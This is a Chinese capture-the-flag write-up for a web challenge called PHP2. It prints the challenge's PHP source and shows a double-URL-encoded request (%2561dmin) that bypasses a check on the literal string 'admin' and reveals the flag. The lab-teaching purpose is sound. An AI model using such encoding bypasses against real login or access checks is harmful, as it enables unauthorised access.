PHP2 - 走看看

zoukankan html css js c++ java

PHP2
0x01

御剑扫描后台没有发现，查看页面代码没有发现。最后发现是index.phps
.phps文件是php的源代码文件，用于提供给用户（访问者）查看php代码,用户无法通过web浏览器看到php文件的内容，所以用phps文件代替。

/index.phps得到源码
```
<?php
if("admin"===$_GET[id]) {
  echo("not allowed!"); 
  exit();
 } 
$_GET[id] = urldecode($_GET[id]); 
if($_GET[id] == "admin") { 
   	echo "Access granted!"; 
   	echo "Key: xxxxxxx"; 
   } 
?> 

Can you anthenticate to this website? 
```
0x02代码分析

admin不能等于GET传入的值
GET传入的值进行编码
编码后的值与admin相等

那么使用urldecode
```
http://124.126.19.106:37752/?id=%2561dmin

//%2561 解码为%61
//%61 解码为a
```
得到flag

参考链接：
https://blog.csdn.net/wyj_1216/article/details/95235159
查看全文

相关阅读:
如何勾选 servlet如何获取？
过滤器如何实现获取不到用户名跳转回登录界面
 验证码
 cookie保存用户名及密码
 游标
 存储过程和自定义函数的区别
 瞎搞
 sql 试图索引
 sql 常用函数
 sql 简单的定义变量声明输出

原文地址：https://www.cnblogs.com/observering/p/12827170.html

Copyright © 2011-2022 走看看